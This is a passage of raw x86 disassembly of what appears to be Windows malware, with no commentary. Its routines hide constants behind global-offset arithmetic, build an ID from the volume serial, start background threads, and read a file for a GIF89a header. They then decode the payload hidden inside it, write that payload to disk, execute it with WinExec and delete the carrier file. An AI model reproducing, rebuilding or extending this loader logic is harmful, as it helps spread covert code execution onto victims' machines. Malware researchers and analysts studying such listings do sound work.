add eax, dword_44D0C8
sub eax, 6
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_44CD6C ; WriteFile
push edi
call ds:dword_44B82C ; CloseHandle
loc_43E2C2: ; CODE XREF: sub_43E1E8+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_43E1E8 endp
; =============== S U B R O U T I N E =======================================
sub_43E2C7 proc near ; DATA XREF: .data:0044D374�o
mov eax, 80004001h
retn 10h
sub_43E2C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E2CF proc near ; CODE XREF: sub_4443C4+3C�p
; sub_4443C4+C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
mov eax, dword_44D0EC
add eax, 0FAh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
mov eax, dword_44D224
add eax, 0FBh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
movsx esi, word_44D204
sub esi, 6
jmp short loc_43E354
; ---------------------------------------------------------------------------
loc_43E314: ; CODE XREF: sub_43E2CF+95�j
mov edi, dword_44D0A8
dec edi
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_43E332
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_43E332: ; CODE XREF: sub_43E2CF+5C�j
mov ecx, off_44D27C
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov ecx, dword_44D18C
add ecx, 3Fh
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_43E354: ; CODE XREF: sub_43E2CF+43�j
mov eax, dword_44D214
add eax, dword_44D244
sub eax, 6
cmp esi, eax
jl short loc_43E314
pop edi
pop esi
pop ebx
leave
retn
sub_43E2CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E36B proc near ; DATA XREF: sub_43E524+D1�o
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp+var_210]
push eax
push offset dword_4490A0
call sub_44285A
add esp, 8
mov [ebp+var_208], eax
test eax, eax
jnz short loc_43E39C
xor eax, eax
jmp loc_43E51F
; ---------------------------------------------------------------------------
loc_43E39C: ; CODE XREF: sub_43E36B+28�j
mov eax, dword_44D0D4
add eax, 4
mov [ebp+var_204], eax
loc_43E3AA: ; CODE XREF: sub_43E36B+1A0�j
mov eax, [ebp+var_204]
mov edx, [ebp+var_208]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_43E3BC: ; CODE XREF: sub_43E36B+56�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E3BC
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0FFh
jnb short loc_43E3F9
mov eax, [ebp+var_204]
mov edx, dword_44D244
sub edx, 8
add eax, edx
add eax, [ebp+var_208]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_445970
loc_43E3F9: ; CODE XREF: sub_43E36B+68�j
mov eax, dword_44D15C
mov esi, eax
add esi, dword_44D10C
jmp short loc_43E42D
; ---------------------------------------------------------------------------
loc_43E408: ; CODE XREF: sub_43E36B+D4�j
cmp [ebp+esi+var_FF], 28h
jnz short loc_43E41A
mov [ebp+esi+var_FF], 2Bh
loc_43E41A: ; CODE XREF: sub_43E36B+A5�j
cmp [ebp+esi+var_FF], 29h
jnz short loc_43E42C
mov [ebp+esi+var_FF], 3Dh
loc_43E42C: ; CODE XREF: sub_43E36B+B7�j
inc esi
loc_43E42D: ; CODE XREF: sub_43E36B+9B�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_43E436: ; CODE XREF: sub_43E36B+D0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E436
cmp esi, eax
jb short loc_43E408
push 0FFh
lea eax, [ebp+var_1FE]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_43B73E
add esp, 0Ch
mov ebx, eax
mov edi, dword_44D244
sub edi, 9
jmp short loc_43E497
; ---------------------------------------------------------------------------
loc_43E469: ; CODE XREF: sub_43E36B+12E�j
movsx eax, [ebp+edi+var_1FE]
mov [ebp+var_218], eax
mov eax, edi
mul edi
mov [ebp+var_21C], eax
mov eax, [ebp+var_218]
mov edx, [ebp+var_21C]
sub eax, edx
mov [ebp+edi+var_1FE], al
inc edi
loc_43E497: ; CODE XREF: sub_43E36B+FC�j
cmp edi, ebx
jb short loc_43E469
mov eax, dword_44D1EC
sub eax, 5
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1FE]
push eax
call sub_444D98
add esp, 0Ch
mov [ebp+var_214], eax
mov eax, dword_44D224
add eax, 0FFF4h
add eax, dword_44D1F8
cmp [ebp+var_214], eax
jz short loc_43E4E5
push [ebp+var_208]
call ds:dword_4495CC ; LocalFree
xor eax, eax
inc eax
jmp short loc_43E51F
; ---------------------------------------------------------------------------
loc_43E4E5: ; CODE XREF: sub_43E36B+167�j
mov eax, [ebp+var_20C]
mov edx, dword_44D1B4
add edx, dword_44D184
add eax, edx
add [ebp+var_204], eax
mov eax, [ebp+var_210]
cmp [ebp+var_204], eax
jb loc_43E3AA
push [ebp+var_208]
call ds:dword_4495CC ; LocalFree
xor eax, eax
loc_43E51F: ; CODE XREF: sub_43E36B+2C�j
; sub_43E36B+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_43E36B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E524 proc near ; CODE XREF: sub_43A39F+2E4�p
var_275 = byte ptr -275h
var_274 = byte ptr -274h
var_270 = byte ptr -270h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_10C = byte ptr -10Ch
var_106 = byte ptr -106h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_FA = byte ptr -0FAh
push ebp
mov ebp, esp
sub esp, 278h
push edi
lea eax, [ebp+var_203]
push eax
mov eax, dword_44D0C8
movsx edx, word_44D220
add eax, edx
sub eax, 9
push eax
push 0
push 1Ch
push 0
call ds:dword_449A00 ; SHGetFolderPathA
lea eax, [ebp+var_267]
push eax
call sub_43E7D1
push offset byte_44E38F
call sub_43AC82
mov edi, dword_44D0B0
sub edi, 4
push edi
lea edi, [ebp+var_267]
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_44A220
call ds:dword_44C810
push offset dword_44E37C
call sub_43AC82
mov edi, dword_44D150
add edi, 3
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_4490A0
call ds:dword_44C810
push offset byte_44E369
call sub_43AC82
mov edi, dword_44D0BC
add edi, dword_44D104
dec edi
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_44A430
call ds:dword_44C810
lea eax, sub_441F97
mov ds:dword_44C804, eax
lea eax, sub_441F97
mov ds:dword_447000, eax
lea eax, sub_43E36B
mov ds:dword_44C954, eax
push offset dword_447FD0
call sub_43F294
mov eax, dword_44D22C
movsx edx, word_44D194
add eax, edx
sub eax, 3
push eax
push offset dword_44A1F0
call sub_443CD1
lea eax, sub_440FDF
mov ds:dword_44A1EC, eax
lea eax, sub_441ECB
mov ds:dword_4499E4, eax
lea eax, dword_4490A0
mov ds:dword_44B814, eax
lea eax, dword_44A430
mov ds:dword_446018, eax
lea eax, dword_44C850
mov dword_44D33C, eax
lea eax, [ebp+var_26C]
push eax
mov eax, dword_44D10C
add eax, dword_44D1AC
sub eax, 5
push eax
push 0
push offset sub_43AD58
mov eax, dword_44D168
add eax, dword_44D218
sub eax, 12h
push eax
push 0
call ds:dword_44CD70 ; CreateThread
push eax
call ds:dword_44B82C ; CloseHandle
lea eax, [ebp+var_270]
push eax
movsx eax, word_44D128
sub eax, 5
push eax
push 0
push offset sub_4446AE
mov eax, dword_44D0A4
sub eax, 9
push eax
push 0
call ds:dword_44CD70 ; CreateThread
push eax
call ds:dword_44B82C ; CloseHandle
lea eax, [ebp+var_274]
push eax
mov eax, dword_44D1B4
sub eax, 4
push eax
push 0
push offset sub_43F02F
movsx eax, word_44D190
sub eax, 5
push eax
push 0
call ds:dword_44CD70 ; CreateThread
push eax
call ds:dword_44B82C ; CloseHandle
movsx eax, word_44D110
add eax, 0Ah
mov ds:dword_4495D0, eax
mov eax, dword_44D0D4
inc eax
push eax
lea eax, [ebp+var_FF]
push eax
call sub_443D39
add esp, 58h
mov eax, dword_44D140
add eax, dword_44D1B4
cmp [ebp+eax+var_10C], 64h
jnz short loc_43E777
movsx eax, [ebp+var_FE]
mov edx, dword_44D248
add edx, 19h
add edx, dword_44D230
sub eax, edx
mov [ebp+var_275], al
movzx eax, [ebp+var_275]
push eax
push 0
call sub_440CB4
add esp, 8
mov eax, dword_44D170
add eax, dword_44D238
sub eax, 0Eh
mov ds:dword_4495D0, eax
loc_43E777: ; CODE XREF: sub_43E524+20E�j
mov eax, dword_44D178
add eax, dword_44D1C8
cmp [ebp+eax+var_106], 67h
jnz short loc_43E7CE
mov eax, dword_44D1D0
mov edx, dword_44D1A8
sub edx, 8
mov [ebp+eax+var_FA], dl
lea eax, [ebp+var_FE]
push eax
call ds:dword_447008
mov [ebp-278h], eax
push eax
push offset dword_44C850
call sub_44318C
add esp, 0Ch
movsx eax, word_44D148
mov ds:dword_4495D0, eax
loc_43E7CE: ; CODE XREF: sub_43E524+266�j
pop edi
leave
retn
sub_43E524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E7D1 proc near ; CODE XREF: sub_43E524+36�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_4495B0 ; GetSystemDirectoryA
mov eax, dword_44D0D4
add eax, 3
add eax, dword_44D15C
movsx edx, word_44D130
sub edx, 2
mov [ebp+eax+var_108], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call ds:dword_44C7E4 ; GetVolumeInformationA
push offset byte_44E361
call sub_43AC82
push [ebp+var_10C]
push eax
push edi
call ds:dword_44C810
add esp, 10h
mov eax, dword_44D0EC
add eax, dword_44D224
sub eax, 0Bh
mov [ebp+var_4], eax
jmp short loc_43E8A0
; ---------------------------------------------------------------------------
loc_43E871: ; CODE XREF: sub_43E7D1+E3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_43E887
cmp al, 39h
jg short loc_43E887
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_43E887: ; CODE XREF: sub_43E7D1+A8�j
; sub_43E7D1+AC�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_43E89D
cmp al, 5Ah
jg short loc_43E89D
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_43E89D: ; CODE XREF: sub_43E7D1+BE�j
; sub_43E7D1+C2�j
inc [ebp+var_4]
loc_43E8A0: ; CODE XREF: sub_43E7D1+9E�j
movsx eax, word_44D190
mov edx, dword_44D0E0
lea eax, [eax+edx+1]
cmp [ebp+var_4], eax
jb short loc_43E871
pop edi
leave
retn
sub_43E7D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E8B9 proc near ; DATA XREF: .data:0044D338�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44D114
add eax, dword_44D0BC
dec eax
cmp ds:dword_4495D0, eax
jnb short loc_43E8EF
mov eax, dword_44D0A8
sub eax, 4
mov ds:dword_4495D0, eax
loc_43E8EF: ; CODE XREF: sub_43E8B9+27�j
mov eax, dword_44D0A4
movsx edx, word_44D1B8
mov edi, eax
add edi, edx
sub edi, 0Eh
jmp short loc_43E910
; ---------------------------------------------------------------------------
loc_43E904: ; CODE XREF: sub_43E8B9+6C�j
lea edx, ds:4480E0h[edi*4]
cmp esi, edx
jz short loc_43E927
inc edi
loc_43E910: ; CODE XREF: sub_43E8B9+49�j
mov eax, dword_44D1E8
add eax, 3DDh
movsx edx, word_44D0E8
add eax, edx
cmp edi, eax
jb short loc_43E904
loc_43E927: ; CODE XREF: sub_43E8B9+54�j
mov eax, dword_44D14C
add eax, 3DBh
add eax, dword_44D224
cmp edi, eax
jnz short loc_43E942
xor eax, eax
jmp loc_43EB73
; ---------------------------------------------------------------------------
loc_43E942: ; CODE XREF: sub_43E8B9+80�j
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset dword_44ECD4
mov edx, ds:dword_446050[edi*4]
push ds:dword_446050[edi*4]
mov edx, [edx]
call dword ptr ds:0[edx]
mov ebx, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov ebx, eax
mov eax, dword_44D1B0
sub eax, 7
cmp ebx, eax
jnz short loc_43E9F9
lea eax, [ebp+var_C]
push eax
push offset dword_44EC44
mov eax, [ebp+var_8]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov ebx, eax
movsx eax, word_44D0F8
add eax, dword_44D184
sub eax, 2
cmp ebx, eax
jnz short loc_43E9F0
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov ebx, eax
mov eax, dword_44D094
sub eax, 2
cmp ebx, eax
jnz short loc_43E9E7
mov eax, dword_44D174
add eax, dword_44D118
sub eax, 5
push eax
push [ebp+var_10]
push [ebp+var_4]
call sub_4435CB
add esp, 0Ch
loc_43E9E7: ; CODE XREF: sub_43E8B9+10F�j
mov eax, [ebp+var_C]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43E9F0: ; CODE XREF: sub_43E8B9+F4�j
mov eax, [ebp+var_8]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43E9F9: ; CODE XREF: sub_43E8B9+C8�j
movzx edx, ds:word_449A10[edi*2]
movsx ecx, word_44D144
add ecx, dword_44D224
sub ecx, 0Dh
cmp edx, ecx
jnz short loc_43EA3C
movzx eax, ds:byte_4491B0[edi]
push eax
push ds:dword_447010[edi*4]
call sub_43E1E8
add esp, 8
and ds:dword_4480E0[edi*4], 0
xor eax, eax
jmp loc_43EB73
; ---------------------------------------------------------------------------
loc_43EA3C: ; CODE XREF: sub_43E8B9+15A�j
movzx edx, ds:word_449A10[edi*2]
mov ecx, dword_44D208
add ecx, 0FFF3h
movsx eax, word_44D21C
add ecx, eax
cmp edx, ecx
jnz loc_43EB4E
movsx eax, word_44D0F8
movsx edx, word_44D180
add eax, edx
sub eax, 6
mov [ebp+var_14], eax
jmp loc_43EB37
; ---------------------------------------------------------------------------
loc_43EA7C: ; CODE XREF: sub_43E8B9+28B�j
mov edx, [ebp+var_14]
mov [ebp+var_18], edx
mov ecx, edx
shl ecx, 2
mov [ebp+var_1C], ecx
cmp ds:dword_4480E0[ecx], 0
jz loc_43EB34
movzx eax, ds:word_449A10[edx*2]
movsx edx, word_44D144
movsx ecx, word_44D0C4
lea edx, [edx+ecx+0FFEDh]
cmp eax, edx
jz short loc_43EB34
mov edx, ds:dword_447010[edi*4]
mov ecx, [ebp+var_1C]
cmp ds:dword_447010[ecx], edx
jnz short loc_43EB34
mov edx, [ebp+var_18]
mov dl, ds:byte_4491B0[edx]
cmp dl, ds:byte_4491B0[edi]
jnz short loc_43EB34
mov edx, [ebp+var_14]
movzx edx, ds:word_449A10[edx*2]
mov ecx, dword_44D20C
movsx eax, word_44D220
add ecx, eax
sub ecx, 0Dh
cmp edx, ecx
jnz short loc_43EB25
mov edx, [ebp+var_14]
movzx ecx, ds:byte_4491B0[edx]
push ecx
push ds:dword_447010[edx*4]
call sub_43E1E8
add esp, 8
and ds:dword_4480E0[edi*4], 0
jmp short loc_43EB4A
; ---------------------------------------------------------------------------
loc_43EB25: ; CODE XREF: sub_43E8B9+245�j
mov edx, [ebp+var_14]
lea edx, ds:449A10h[edx*2]
dec word ptr [edx]
jmp short loc_43EB4A
; ---------------------------------------------------------------------------
loc_43EB34: ; CODE XREF: sub_43E8B9+1D9�j
; sub_43E8B9+1FE�j ...
inc [ebp+var_14]
loc_43EB37: ; CODE XREF: sub_43E8B9+1BE�j
mov eax, dword_44D19C
add eax, 3DFh
cmp [ebp+var_14], eax
jb loc_43EA7C
loc_43EB4A: ; CODE XREF: sub_43E8B9+26A�j
; sub_43E8B9+279�j
xor eax, eax
jmp short loc_43EB73
; ---------------------------------------------------------------------------
loc_43EB4E: ; CODE XREF: sub_43E8B9+1A2�j
movzx edx, ds:word_449A10[edi*2]
mov ecx, dword_44D09C
add ecx, dword_44D118
sub ecx, 6
cmp edx, ecx
jle short loc_43EB71
dec ds:word_449A10[edi*2]
loc_43EB71: ; CODE XREF: sub_43E8B9+2AE�j
xor eax, eax
loc_43EB73: ; CODE XREF: sub_43E8B9+84�j
; sub_43E8B9+17E�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43E8B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EB7A proc near ; CODE XREF: sub_43D4AD+211�p
; sub_43D4AD+223�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D4C = byte ptr -30D4Ch
var_30D47 = byte ptr -30D47h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
var_30D37 = byte ptr -30D37h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_445950
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
movsx eax, word_44D114
movsx edx, word_44D204
add eax, edx
sub eax, 0Fh
push eax
push 3
push 0
movsx eax, word_44D194
sub eax, 9
push eax
push 80000000h
push [ebp+arg_0]
call ds:dword_44C968 ; CreateFileA
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_43F02A
push 0
lea eax, [ebp+var_30E4C]
push eax
mov eax, dword_44D174
add eax, 81h
movsx edx, word_44D0A0
add eax, edx
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call ds:dword_44602C ; ReadFile
mov [ebp+var_30E44], eax
mov eax, dword_44D208
movsx edx, word_44D098
add eax, edx
sub eax, 0Bh
cmp [ebp+var_30E44], eax
jz loc_43F00C
cmp [ebp+var_30E3F], 47h
jnz short loc_43EC5F
cmp [ebp+var_30E3E], 49h
jnz short loc_43EC5F
cmp [ebp+var_30E3D], 46h
jnz short loc_43EC5F
cmp [ebp+var_30E3C], 38h
jnz short loc_43EC5F
cmp [ebp+var_30E3B], 39h
jnz short loc_43EC5F
cmp [ebp+var_30E3A], 61h
jz short loc_43EC64
loc_43EC5F: ; CODE XREF: sub_43EB7A+B6�j
; sub_43EB7A+BF�j ...
jmp loc_43F00C
; ---------------------------------------------------------------------------
loc_43EC64: ; CODE XREF: sub_43EB7A+E3�j
movzx eax, [ebp+var_30E15]
mov edx, dword_44D1A0
add edx, 3Bh
cmp eax, edx
jnz short loc_43EC8A
cmp [ebp+var_30DBE], 3Dh
jnz short loc_43EC8A
cmp [ebp+var_30DBD], 3Dh
jz short loc_43EC8F
loc_43EC8A: ; CODE XREF: sub_43EB7A+FC�j
; sub_43EB7A+105�j
jmp loc_43F00C
; ---------------------------------------------------------------------------
loc_43EC8F: ; CODE XREF: sub_43EB7A+10E�j
or ebx, ebx
jnz short loc_43ECBE
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_440FDF
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_43F00C
loc_43ECBE: ; CODE XREF: sub_43EB7A+117�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call ds:dword_44602C ; ReadFile
mov [ebp+var_30E44], eax
mov eax, dword_44D140
movsx edx, word_44D180
add eax, edx
sub eax, 0Eh
cmp [ebp+var_30E44], eax
jz loc_43F00C
mov eax, [ebp+var_30E4C]
movsx edx, word_44D0B4
add edx, dword_44D218
sub edx, 0Dh
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_43B73E
add esp, 0Ch
mov esi, eax
mov eax, dword_44D244
mov edi, eax
add edi, dword_44D0EC
sub edi, 0Fh
jmp short loc_43ED93
; ---------------------------------------------------------------------------
loc_43ED4E: ; CODE XREF: sub_43EB7A+21B�j
or ebx, ebx
jz short loc_43ED65
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_43ED92
; ---------------------------------------------------------------------------
loc_43ED65: ; CODE XREF: sub_43EB7A+1D6�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_43ED92: ; CODE XREF: sub_43EB7A+1E9�j
inc edi
loc_43ED93: ; CODE XREF: sub_43EB7A+1D2�j
cmp edi, esi
jb short loc_43ED4E
or ebx, ebx
jz short loc_43EDC7
mov eax, dword_44D224
movsx edx, word_44D120
add eax, edx
sub eax, 0Dh
mov edx, esi
sub edx, eax
movsx eax, word_44D12C
add eax, dword_44D0D4
sub eax, 8
mov [ebp+edx+var_30D40], al
loc_43EDC7: ; CODE XREF: sub_43EB7A+21F�j
mov eax, dword_44D15C
add eax, 7Dh
add eax, dword_44D1F8
mov edx, dword_44D17C
sub edx, 9
mov [ebp+eax+var_30E3F], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_43B73E
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_43F09C
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, dword_44D0A8
sub eax, 4
cmp [ebp+var_30E44], eax
jnz loc_43F00C
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_43EF6C
mov eax, dword_44D0FC
cmp [ebp+eax+var_30D47], 64h
jnz loc_43EED9
movzx eax, [ebp+var_30D3F]
mov edx, dword_44D108
add edx, 10h
movsx ecx, word_44D0F4
add edx, ecx
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_440CB4
mov eax, dword_44D0DC
mov ds:dword_4495D0, eax
movsx eax, word_44D0B8
sub eax, 9
mov dword_44D31C, eax
movsx eax, word_44D0C4
mov edx, dword_44D0EC
add edx, dword_44D0AC
sub edx, 0Bh
mov [ebp+eax+var_30D47], dl
movsx eax, word_44D180
add eax, dword_44D178
sub eax, 9
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_4410CF
add esp, 10h
loc_43EED9: ; CODE XREF: sub_43EB7A+2D3�j
mov eax, dword_44D188
add eax, dword_44D1BC
cmp [ebp+eax+var_30D4C], 67h
jnz loc_43F00C
mov eax, dword_44D1E4
mov edx, dword_44D100
add edx, dword_44D1B0
sub edx, 0Eh
mov [ebp+eax+var_30D37], dl
lea eax, [ebp+var_30D3F]
push eax
call ds:dword_447008
mov [ebp+var_61D9C], eax
push eax
push offset dword_44C850
call sub_44318C
mov eax, dword_44D100
sub eax, 7
mov ds:dword_4495D0, eax
movsx eax, word_44D0F8
add eax, dword_44D14C
sub eax, 9
mov dword_44D31C, eax
movsx eax, word_44D0C4
sub eax, 8
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_4410CF
add esp, 14h
jmp loc_43F00C
; ---------------------------------------------------------------------------
loc_43EF6C: ; CODE XREF: sub_43EB7A+2C0�j
movsx eax, word_44D1C0
sub eax, 2
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_443CD1
push offset byte_44E359
call sub_43AC82
push eax
lea edx, [ebp+var_30F4B]
push edx
call ds:dword_446024
push 0
push 80h
push 2
push 0
push dword_44D240
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_44C968 ; CreateFileA
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call ds:dword_44CD6C ; WriteFile
push [ebp+var_61C98]
call ds:dword_44B82C ; CloseHandle
push 5
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_449094 ; WinExec
movzx eax, [ebp+var_30F51]
push eax
call sub_441ECB
add esp, 18h
loc_43F00C: ; CODE XREF: sub_43EB7A+A9�j
; sub_43EB7A:loc_43EC5F�j ...
push [ebp+var_30E48]
call ds:dword_44B82C ; CloseHandle
cmp [ebp+var_30F50], 0
jz short loc_43F02A
push [ebp+arg_0]
call ds:dword_446008 ; DeleteFileA
loc_43F02A: ; CODE XREF: sub_43EB7A+56�j
; sub_43EB7A+4A5�j
pop edi
pop esi
pop ebx
leave
retn
sub_43EB7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43F02F proc near ; DATA XREF: sub_43E524+1B7�o
push ebp
mov ebp, esp
loc_43F032: ; CODE XREF: sub_43F02F+2A�j
call sub_43A764
movsx eax, word_44D12C
add eax, 70h
movsx edx, word_44D0E8
add edx, 0EA5Ch
imul eax, edx
push eax
call ds:dword_44C80C
pop ecx
jmp short loc_43F032
sub_43F02F endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F05F proc near ; DATA XREF: sub_43B8E8+B�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov esi, [ebp+arg_8]
mov eax, offset sub_43BB6D
mov [esi+0B8h], eax
mov eax, [ebp+arg_4]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
sub_43F05F endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F082 proc near ; CODE XREF: sub_43F09C+C8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_44D2DC
push offset dword_44D29C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_444F08
pop ebp
retn
sub_43F082 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F09C proc near ; CODE XREF: sub_43EB7A+292�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_43F0B3
add eax, 3Fh
loc_43F0B3: ; CODE XREF: sub_43F09C+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_43A745
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, dword_44D1CC
add edx, 3Fh
mov eax, edi
add eax, edx
jge short loc_43F0DA
add eax, 3Fh
loc_43F0DA: ; CODE XREF: sub_43F09C+39�j
sar eax, 6
mov edi, dword_44D09C
add edi, 3Bh
add edi, dword_44D0A8
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call ds:dword_446030 ; RtlZeroMemory
push [ebp+arg_4]
push esi
push [ebp+var_14]
call ds:dword_44B808
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_445046
mov esi, [ebp+var_14]
movsx ebx, word_44D210
sub ebx, 6
jmp short loc_43F139
; ---------------------------------------------------------------------------
loc_43F123: ; CODE XREF: sub_43F09C+B7�j
push esi
lea eax, [ebp+var_10]
